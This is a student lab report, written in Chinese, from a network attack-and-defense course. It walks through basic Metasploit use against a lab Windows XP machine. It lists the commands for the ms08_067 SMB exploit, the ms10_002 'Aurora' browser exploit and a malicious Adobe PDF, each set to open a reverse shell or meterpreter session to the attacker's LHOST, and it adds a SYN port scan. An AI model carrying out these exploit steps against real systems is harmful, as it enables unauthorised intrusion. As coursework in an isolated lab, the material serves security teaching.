1. 程式人生 > >20155217《網絡對抗》Exp05 MSF基礎應用

20155217《網絡對抗》Exp05 MSF基礎應用

圖片 9.png 生成 alt 掌握 速度 方式 rev 得到

20155217《網絡對抗》Exp05 MSF基礎應用

實踐內容

本實踐目標是掌握metasploit的基本應用方式,重點常用的三種攻擊方式的思路。具體需要完成:

  • 一個主動攻擊實踐,如ms08_067;
  • 一個針對瀏覽器的攻擊,如ms11_050;
  • 一個針對客戶端的攻擊,如Adobe;
  • 成功應用任何一個輔助模塊。

主動攻擊:ms08_067

  • 先用search ms08_067查詢針對該漏洞的攻擊模塊:

技術分享圖片

  • use exploit/windows/smb/ms08_067_netapi使用該模塊
  • 輸入命令show payloads會顯示出有效的攻擊載荷:

技術分享圖片

  • 使用命令set payload generic/shell_reverse_tcp
    設置攻擊有效載荷
  • 輸入命令set LHOST 192.168.152.130, set RHOST 192.168.152.131
  • 使用命令show options查看payload狀態:

技術分享圖片

  • 輸入命令exploit開始攻擊,攻擊成功(若攻擊失敗,則需要關閉XP的防火墻):

技術分享圖片

  • 在kali上執行ipconfig/all

技術分享圖片

  • 在win xp上執行ipconfig/all:

技術分享圖片

  • 發現二者結果相同,說明成功攻擊。

對瀏覽器攻擊:MS10-002漏洞攻擊

  • 先利用search ms10_002指令查看可以運用的攻擊模塊。

技術分享圖片

  • 使用use windows/browser/ms10_002_aurora模塊。
  • info
    查看該模塊的信息:

技術分享圖片

  • set payload windows/meterpreter/reverse_tcp設置payload,並設置需要設置的參數。
  • show options確認需要設置的參數是否已經設置好:

技術分享圖片

  • 確認參數設置無誤後,用exploit指令開始攻擊,攻擊成功後會有靶機需要訪問的網址:

技術分享圖片

  • 在靶機IE上輸入該網址,此時kali中可以看到有目標主機上線,會話建立。

技術分享圖片

技術分享圖片

  • 輸入sessions -i 1,成功獲取靶機的shell,可以對其進行操作:

技術分享圖片

針對客戶端的攻擊:adobe_toolbutton

  • 輸入use exploit/windows/fileformat/adobe_cooltype_sing
    進入模塊。
  • 使用命令set payload windows/meterpreter/reverse_tcp設置攻擊有效載荷,並設置相關數據:

技術分享圖片

  • 輸入exploit,生成pdf文件,並可以看到pdf所在文件夾,將pdf復制到靶機裏:

技術分享圖片

技術分享圖片

  • 使用use exploit/multi/handler新建監聽模塊:

技術分享圖片

  • 輸入sysinfo,攻擊成功:

技術分享圖片

成功應用任何一個輔助模塊成功應用任何一個輔助模塊

  • show auxiliary查看所有輔助模塊,並從中選擇一個。我使用的是scanner/portscan/syn。它是通過發送TCP SYN標誌的方式來探測開放的端口。
  • show options查看配置,並進行相關配置:

技術分享圖片

  • 配置完成後,run,發現掃描開放端口成功:

技術分享圖片

基礎問題回答

  • 用自己的話解釋什麽是exploit,payload,encode。
  1. exploit是背著payload去攻擊,起到運載作用。
  2. payload則為攻擊負荷。
  3. encode為編碼器,使其得到偽裝,防止被查殺,打掩護用到的。

離實戰還缺些什麽技術或步驟?

實戰的話還需要結合靶機的環境去考慮。

實踐總結與體會

這次實驗再次能夠看出msf是一個比較全面的工具,但滲透的局限性也比較明顯。由於前幾天在準備考試,這次實驗完成得比較晚,但在其他同學的幫助下完成速度還是比較快的,畢竟比他們少走了很多彎路。而且這次又從其他角度成功地進行了攻擊,學習到了不少新的東西,美滋滋:D。

20155217《網絡對抗》Exp05 MSF基礎應用